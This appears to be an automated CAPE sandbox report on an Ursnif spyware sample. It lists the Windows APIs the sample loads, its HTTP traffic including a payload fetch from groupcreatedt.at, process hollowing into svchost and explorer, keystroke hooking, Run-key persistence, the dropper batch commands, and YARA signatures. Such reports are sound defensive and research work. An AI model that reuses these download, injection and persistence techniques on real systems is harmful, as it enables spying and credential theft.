DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: Secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sensapi.dll/IsNetworkAlive
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: devrtl.DLL/DevRtlGetThreadLogToken
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: SETUPAPI.dll/SetupIterateCabinetW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: USER32.dll/SetWindowsHookExA
DynamicLoader: USER32.dll/RegisterClassA
DynamicLoader: USER32.dll/CreateWindowExA
DynamicLoader: USER32.dll/GetWindowLongPtrA
DynamicLoader: USER32.dll/DefWindowProcA
DynamicLoader: USER32.dll/SetWindowLongPtrA
DynamicLoader: USER32.dll/SetClipboardViewer
DynamicLoader: USER32.dll/IsClipboardFormatAvailable
DynamicLoader: USER32.dll/GetClipboardOwner
DynamicLoader: USER32.dll/RegisterDeviceNotificationA
DynamicLoader: USER32.dll/GetMessageA
DynamicLoader: WS2_32.dll/
DynamicLoader: ncrypt.dll/SslDecrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
Encrypts a single HTTP packet
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
http_request: GET /license/3_0.txt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: www.php.net
Reads data out of its own binary image
self_read: process: LjejZswGjULF7Ng.exe, pid: 420, offset: 0x00000000, length: 0x0004ea00
A process created a hidden window
Process: LjejZswGjULF7Ng.exe -> C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
CAPE extracted potentially suspicious content
LjejZswGjULF7Ng.exe: Extracted Shellcode
LjejZswGjULF7Ng.exe: Extracted PE Image: 32-bit executable
LjejZswGjULF7Ng.exe: Extracted PE Image: 32-bit executable
explorer.exe: Ursnif Payload: 64-bit DLL
explorer.exe: YARA match: rule 'Ursnif' (cape_type: Ursnif Payload; description: Ursnif Payload; author: kevoreilly & enzo)
    matched strings: { 41 8B 02 FF C1 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D9 }, { 44 8B D9 33 C0 45 33 C9 44 33 1D 2D B9 01 00 4C 8B D2 48 85 D2 74 37 4C 8D 42 10 45 3B 0A 73 2E 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12 }
    addresses: decrypt_config64: 125588, crypto64_1: 171678
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit DLL
explorer.exe: Extracted PE Image: 64-bit executable
HTTP traffic contains suspicious features which may be indicative of malware related traffic
get_no_useragent: HTTP traffic contains a GET request with no user-agent header
suspicious_request: http://www.php.net/license/3_0.txt
suspicious_request: http://groupcreatedt.at/key/x64.bin
Performs some HTTP requests
url: http://www.php.net/license/3_0.txt
url: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
url: http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
url: http://groupcreatedt.at/key/x64.bin
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00045a00, virtual_size: 0x00045910
Uses Windows utilities for basic functionality
command: cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
Uses Windows utilities for basic functionality
command: C:\Users\user\AppData\Local\Temp\E502\D8E1.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE"
Queries information on disks for anti-virtualization via Device Information APIs
Behavioural detection: Injection (Process Hollowing)
Injection: corrawex.exe(2512) -> svchost.exe(2152)
Executed a process and injected code into it, probably while unpacking
Injection: corrawex.exe(2512) -> svchost.exe(2152)
Deletes its original binary from disk
Sniffs keystrokes
SetWindowsHookExA: Process: explorer.exe(1632)
Behavioural detection: Injection (inter-process)
Behavioural detection: Injection with CreateRemoteThread in a remote process
A system process is generating network traffic likely as a result of process injection
network_connection: explorer.exe_WSASend_get /license/3_0.txt http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: www.php.net
network_connection: explorer.exe_WSASend_get /key/x64.bin http/1.1 cache-control: no-cache connection: keep-alive pragma: no-cache host: groupcreatedt.at
network_connection: explorer.exe_WSASend_get /msdownload/update/v3/static/trustedr/en/authrootstl.cab http/1.1 cache-control: max-age = 3600 connection: keep-alive accept: */* if-modified-since: wed, 26 feb 2020 21:39:14 gmt if-none-match: "06d5b30edecd51:0" user-agent: microsoft-cryptoapi/
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
data: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Exhibits behavior characteristics of Ursnif spyware
CAPE detected the Ursnif malware family
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
binary: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Creates a slightly modified copy of itself
file: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
percent_match: 99

Hosts

Direct  IP              Country Name
Y       8.8.8.8         United States
N       23.202.161.73   United States
N       192.42.116.41   Netherlands
N       185.85.0.29     Germany
N       152.195.11.6    United States

DNS

Name / Response / Post-Analysis Lookup
www.php.net
    A 185.85.0.29
    CNAME www-php-net.ax4z.com
www.download.windowsupdate.com
    A 152.195.11.6
    CNAME 2-01-3cf7-0009.cdx.cedexis.net
    CNAME wu.ec.azureedge.net
    CNAME wu.wpc.apr-52dd2.edgecastdns.net
    CNAME cs611.wpc.edgecastcdn.net
    CNAME wu.azureedge.net
www.microsoft.com
    CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    CNAME e13678.dspb.akamaiedge.net
    CNAME www.microsoft.com-c-3.edgekey.net
    A 23.202.161.73
groupcreatedt.at
    A 192.42.116.41

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\gfycfilt.dll
C:\Windows\System32\gfycfilt.dll
C:\Windows\system\gfycfilt.dll
C:\Windows\gfycfilt.dll
C:\Windows\System32\wbem\gfycfilt.dll
C:\Windows\System32\WindowsPowerShell\v1.0\gfycfilt.dll
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Windows\sysnative\*.dll
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\E502
C:\Users\user\AppData\Local\Temp\E502\D8E1.tmp
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
\??\MountPointManager
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\E502\D8E1.bat"
C:\Users\user\AppData\Local\Temp\cmd.*
C:\Users\user\AppData\Local\Temp\cmd
C:\Windows\System32\cmd.*
C:\Windows\System32\cmd.COM
C:\Windows\System32\cmd.exe
C:\
C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\gfycfilt.dll
C:\Users\user\AppData\Roaming
C:\Windows\sysnative\p2pcollab.dll
C:\Windows\sysnative\QAGENTRT.DLL
C:\Windows\sysnative\dnsapi.dll
C:\Windows\sysnative\fveui.dll
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\
C:\Windows\inf\
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Windows\sysnative\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Windows\sysnative\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Windows\sysnative\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
C:\Windows\sysnative\CabA20F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\prefs.js
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\321.txt
C:\Windows\sysnative\C_1252.NLS
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\E502\D8E1.tmp
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Windows\sysnative\en-US\WINHTTP.dll.mui
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Windows\sysnative\ntdll.dll
C:\Users\user\AppData\Roaming\system64.dll
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
